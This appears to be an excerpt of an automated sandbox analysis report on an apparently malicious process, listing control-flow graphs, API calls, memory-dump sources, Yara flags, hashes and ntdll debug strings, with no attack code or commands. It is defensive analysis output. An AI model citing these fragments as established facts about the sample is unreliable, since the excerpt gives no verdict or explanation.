                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: b73b196f8d6b195a16686c31ff40ee3613791950e5312dbcce9f553fb39e7532
                                                                                                                          • Instruction ID: 3913ffb1fe9d8d599cac7747ae93cb5086c55f435a4f89ac06b1f09a5a83deed
                                                                                                                          • Opcode Fuzzy Hash: b73b196f8d6b195a16686c31ff40ee3613791950e5312dbcce9f553fb39e7532
                                                                                                                          • Instruction Fuzzy Hash: 3290023170560402D510A159461474A505947D0701FE1C919A4518D28DC7A5895179A2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1712 56bf1c-56bfcc call 56bf5c 1717 56bfd2-56c025 call 56c88b call 56ebec 1712->1717 1718 56f3ee-56f4b1 1712->1718 1734 56e546-56e54c call 56c02c 1717->1734 1735 56e518 1717->1735 1722 56f4e4-56f53d LoadLibraryA call 56f542 1718->1722 1723 56f4b3-56f4e1 call 56fcc1 call 56f542 1718->1723 1723->1722 1738 56e553 1734->1738 1735->1738 1739 56e555 1738->1739 1740 56e51e-56e520 1738->1740 1739->1735 1741 56e522 1740->1741 1742 56e4bf-56e4c0 1740->1742 1741->1734 1743 56e4a2 1742->1743 1744 56e4c2-56e4c4 1742->1744 1747 56e4a9-56e4ae 1743->1747 1745 56e4c6 1744->1745 1746 56e463 1744->1746 1748 56e4f0-56e509 call 56c7b8 1745->1748 1746->1747 1747->1748 1748->1735
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
                                                                                                                          • Instruction ID: 28afd958650d09b80608952a58c141fa42a07a02f2b2a8f8e81f643da00c4e30
                                                                                                                          • Opcode Fuzzy Hash: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
                                                                                                                          • Instruction Fuzzy Hash: 8641773560531A9FCF309E285CE53DB2B61BFA53B0FA0072BDC56DB191DB318D458602
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1751 56be04-56bea8 call 56c88b 1756 56f3ee-56f4b1 1751->1756 1757 56beae-56c025 call 56bede call 56ebec 1751->1757 1760 56f4e4-56f53d LoadLibraryA call 56f542 1756->1760 1761 56f4b3-56f4e1 call 56fcc1 call 56f542 1756->1761 1774 56e546-56e54c call 56c02c 1757->1774 1775 56e518 1757->1775 1761->1760 1778 56e553 1774->1778 1775->1778 1779 56e555 1778->1779 1780 56e51e-56e520 1778->1780 1779->1775 1781 56e522 1780->1781 1782 56e4bf-56e4c0 1780->1782 1781->1774 1783 56e4a2 1782->1783 1784 56e4c2-56e4c4 1782->1784 1787 56e4a9-56e4ae 1783->1787 1785 56e4c6 1784->1785 1786 56e463 1784->1786 1788 56e4f0-56e509 call 56c7b8 1785->1788 1786->1787 1787->1788 1788->1775
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
                                                                                                                          • Instruction ID: 0327d574dbc4f0800ebe1b61ab5bdd207f1a4cf2d3da7fc7c8c06abba19ec839
                                                                                                                          • Opcode Fuzzy Hash: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
                                                                                                                          • Instruction Fuzzy Hash: F4319B75A0035ADBDF302F245CA43EE2B6ABF947A0F61052FEC469B241D7318D808742
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1791 56c02c-56c114 call 56c0b3 call 56c88b call 56ebec 1800 56f3ee-56f4b1 1791->1800 1801 56c11a-56c11b 1791->1801 1803 56f4e4-56f53d LoadLibraryA call 56f542 1800->1803 1804 56f4b3-56f4e1 call 56fcc1 call 56f542 1800->1804 1804->1803
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
                                                                                                                          • Instruction ID: 49f2a915e24d8e0c3b808ffb7c77f2a8db2218cc0f56602be14b26dd76b22581
                                                                                                                          • Opcode Fuzzy Hash: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
                                                                                                                          • Instruction Fuzzy Hash: 26319B72A003099BCF30AE2958583DE2B77BFE43A0FBA8427EC49DB201C7318D468751
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1839 56f3ee-56f4b1 1841 56f4e4-56f53d LoadLibraryA call 56f542 1839->1841 1842 56f4b3-56f4e1 call 56fcc1 call 56f542 1839->1842 1842->1841
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
                                                                                                                          • Instruction ID: 6c20cb82a3ff77e6cd48d1178652c92269bc3356b48ccfc60a8d6d5ff6766eed
                                                                                                                          • Opcode Fuzzy Hash: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
                                                                                                                          • Instruction Fuzzy Hash: 55116B71A0132A9BCF306F2969A83CB2776BFD8790FA5442BEC4ADB201DB718D418751
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1853 1e8f2b2a-1e8f2b2f 1854 1e8f2b3f-1e8f2b46 LdrInitializeThunk 1853->1854 1855 1e8f2b31-1e8f2b38 1853->1855
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: f7826e858ca1f3195d9b112b58a1f64a87ef3b72ce635aaa4abc96c06aea18fd
                                                                                                                          • Instruction ID: 0526cdf0536bf8354c8339042182d7e75aed50185f2fbedb0ad8df34d479ccf0
                                                                                                                          • Opcode Fuzzy Hash: f7826e858ca1f3195d9b112b58a1f64a87ef3b72ce635aaa4abc96c06aea18fd
                                                                                                                          • Instruction Fuzzy Hash: 77B02B319014C1C5D600D720070870B790467C0B01F51C115D1020A00EC338C090F231
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                          • API String ID: 3446177414-1700792311
                                                                                                                          • Opcode ID: 0af8edec5393ccbb994a6fa1d6aafb7640d0cf89052f3e08e6b32a6d259a23f6
                                                                                                                          • Instruction ID: 2c0afd6589bc538a8f1c5e1512e9740959f9036e46fc9fb43d9b47aa75b8d8d2
                                                                                                                          • Opcode Fuzzy Hash: 0af8edec5393ccbb994a6fa1d6aafb7640d0cf89052f3e08e6b32a6d259a23f6
                                                                                                                          • Instruction Fuzzy Hash: 4DD1F335504685DFCB22CFA8C490AADBBF6FF89310F048A5EE8459B752D735A981CF10
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                          • API String ID: 0-4253913091
                                                                                                                          • Opcode ID: 88da66ffb26acf61d7442b21fff1a321b7c1c718d73947058aa74cdc301fd89e
                                                                                                                          • Instruction ID: 8ad0d6fb811714eca10da0fc7248ad4eace876b97c163c49f6ccbaad1d8db7a4
                                                                                                                          • Opcode Fuzzy Hash: 88da66ffb26acf61d7442b21fff1a321b7c1c718d73947058aa74cdc301fd89e
                                                                                                                          • Instruction Fuzzy Hash: 3CF1BE74A0064ADFDB05CF69C890BAAB7B6FF86740F14866DE4159B381D734E982CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3446177414-0
                                                                                                                          • Opcode ID: 375523c332eeb3efdbe689127e94438d8dcd868dc67ca018378924086731b63e
                                                                                                                          • Instruction ID: 22b94db48604072f8e2a00f7b2bff2ce94679b6ccc06c27598edd14712258bfe
                                                                                                                          • Opcode Fuzzy Hash: 375523c332eeb3efdbe689127e94438d8dcd868dc67ca018378924086731b63e
                                                                                                                          • Instruction Fuzzy Hash: 74F11672E006598FCB19CF68C8A0A7DBBF6AF8820071A476DD456DB394E774E941CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • GsHd, xrefs: 1E8CD794
                                                                                                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1E919372
                                                                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 1E91914E, 1E919173
                                                                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919153
                                                                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919178
                                                                                                                          • Actx , xrefs: 1E919315
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                          • API String ID: 3446177414-2196497285
                                                                                                                          • Opcode ID: 39e568aa5e97859da72d087657729e9edb47046c33339f0de35c10a510ebb4dc
                                                                                                                          • Instruction ID: 8cb2b3911b704a202e9d2fdb0f0fb3e7eed4f5ca16d285c3a435b84e11cf4631
                                                                                                                          • Opcode Fuzzy Hash: 39e568aa5e97859da72d087657729e9edb47046c33339f0de35c10a510ebb4dc
                                                                                                                          • Instruction Fuzzy Hash: 78E18B706083468FD711DF19C890B9AB7E6FF89328F044B2DE9959B2C1D770E985CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                          • API String ID: 3446177414-4227709934
                                                                                                                          • Opcode ID: 418b33b8c2c6ec15cec2ae322837331767e369f2d8b8cc52f7a7139c3d7458c1
                                                                                                                          • Instruction ID: 547ad52d1f5df5de6dd0bd51f64202b0da35348653418bbf5b0a0499c7004d3f
                                                                                                                          • Opcode Fuzzy Hash: 418b33b8c2c6ec15cec2ae322837331767e369f2d8b8cc52f7a7139c3d7458c1
                                                                                                                          • Instruction Fuzzy Hash: 88415E7590121AABCF02CF95C894AEEBBBABF88354F54022DE905B7344D7719941DF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                          • API String ID: 3446177414-3492000579
                                                                                                                          • Opcode ID: f91e6a1a3a1764e5881a8a5dc3c69109d257b6fd832e1517975bf961d946279f
                                                                                                                          • Instruction ID: aeaa8dcbf8dbce52ba6ce0f1a8adb7197c6c2d88cf2f96835c8eb15044b4c92e
                                                                                                                          • Opcode Fuzzy Hash: f91e6a1a3a1764e5881a8a5dc3c69109d257b6fd832e1517975bf961d946279f
                                                                                                                          • Instruction Fuzzy Hash: 7C71BE35904685EFCB02DFA8D8A0AADFBF6FF89220F04865EE4459B351D735A980CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                          • API String ID: 3446177414-3224558752
                                                                                                                          • Opcode ID: b10a4a09f937279abed18b2da23fff095e618d6ad8f6b53dae843c8896c4aad7
                                                                                                                          • Instruction ID: ebe54a65b87e4b381568a7d8354f6c8a3860a487e46677da6f5bb182b6f66092
                                                                                                                          • Opcode Fuzzy Hash: b10a4a09f937279abed18b2da23fff095e618d6ad8f6b53dae843c8896c4aad7
                                                                                                                          • Instruction Fuzzy Hash: 31413635954789DFC722DF28C494B99B3A9FF40320F048B6DE8168B3C1C738A984CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • HEAP: , xrefs: 1E95ECDD
                                                                                                                          • Entry Heap Size , xrefs: 1E95EDED
                                                                                                                          • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1E95EDE3
                                                                                                                          • ---------------------------------------, xrefs: 1E95EDF9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                          • API String ID: 3446177414-1102453626
                                                                                                                          • Opcode ID: 2c55faccb35043b79ec81085057293245eaa467a498317241b3f1f7b0adc4b37
                                                                                                                          • Instruction ID: c868dafd79be457cf34d8ee75ffd9967d4b38b90fae92619c0905e85f5acb4a6
                                                                                                                          • Opcode Fuzzy Hash: 2c55faccb35043b79ec81085057293245eaa467a498317241b3f1f7b0adc4b37
                                                                                                                          • Instruction Fuzzy Hash: 6841A035A10265DFC715CF19C484969BBEAFF86354725C66EE5059B311D732EC42CF80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                          • API String ID: 3446177414-1222099010
                                                                                                                          • Opcode ID: 86936b012511a38ad7d06f19cadea97447cc5cd2f91babb9721754840e30578c
                                                                                                                          • Instruction ID: f19bd5dd62c6fc0db5f8b261023cc16b33072bd5ccbde0271516257a4cb5ed45
                                                                                                                          • Opcode Fuzzy Hash: 86936b012511a38ad7d06f19cadea97447cc5cd2f91babb9721754840e30578c
                                                                                                                          • Instruction Fuzzy Hash: 6D3100355147CCDFD722CF28C858FA97BA9FF01768F044B99E8028B791C779A988CA11
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • LdrpFindDllActivationContext, xrefs: 1E923440, 1E92346C
                                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 1E92344A, 1E923476
                                                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 1E923466
                                                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E923439
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                          • API String ID: 3446177414-3779518884
                                                                                                                          • Opcode ID: 9db3e8ac34cd91deae3a5aa1e180387fdb2a13e1e14ae253c850780dde7b558a
                                                                                                                          • Instruction ID: e00536071bbb5710b84bcc47732331ff08f497dee7669940f19939fee1637492
                                                                                                                          • Opcode Fuzzy Hash: 9db3e8ac34cd91deae3a5aa1e180387fdb2a13e1e14ae253c850780dde7b558a
                                                                                                                          • Instruction Fuzzy Hash: 3D314E72E00297AFDB12DB1C889AA59B2A5FF83354F42832AD90D57EC4D7709D80C7D1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                          • API String ID: 3446177414-3610490719
                                                                                                                          • Opcode ID: 8e7dc8a89f7fe1fd8b01ed148f73f4ad947f9e72e5fd6f67020f0503b25cf44c
                                                                                                                          • Instruction ID: 307c4f4e8f421d2bf7b35f46c5c7d3b133776947de916ac59e53f4f42b6af5c4
                                                                                                                          • Opcode Fuzzy Hash: 8e7dc8a89f7fe1fd8b01ed148f73f4ad947f9e72e5fd6f67020f0503b25cf44c
                                                                                                                          • Instruction Fuzzy Hash: 1891E975604695AFC726CB29C850B6EB7AABFC4644F040B5DFA419B3C1DB34F881CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • LdrpCheckModule, xrefs: 1E919F24
                                                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 1E919F1C
                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 1E919F2E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 3446177414-161242083
                                                                                                                          • Opcode ID: 3c732b401bb2a524721acff42251abf68d39b7af26a8861e391dfbef9151fd81
                                                                                                                          • Instruction ID: 85b598013651d358d2448a25c393deb2f12dab150e90cba5ac757a0000a11a65
                                                                                                                          • Opcode Fuzzy Hash: 3c732b401bb2a524721acff42251abf68d39b7af26a8861e391dfbef9151fd81
                                                                                                                          • Instruction Fuzzy Hash: F171BE74A042499FDB05DF68C890AAEB7F6FF84708F18466DE802EB355E730AD46CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: Wow64 Emulation Layer
                                                                                                                          • API String ID: 3446177414-921169906
                                                                                                                          • Opcode ID: 8a9779b77936d709f7e80b663a36317e8bba99cd6da6e7207084c04f89fd1fde
                                                                                                                          • Instruction ID: bc3b4e6b1089beb7e32d916fe1d3c012bcd337d921a61a98c7cccc1e2e8e0d6b
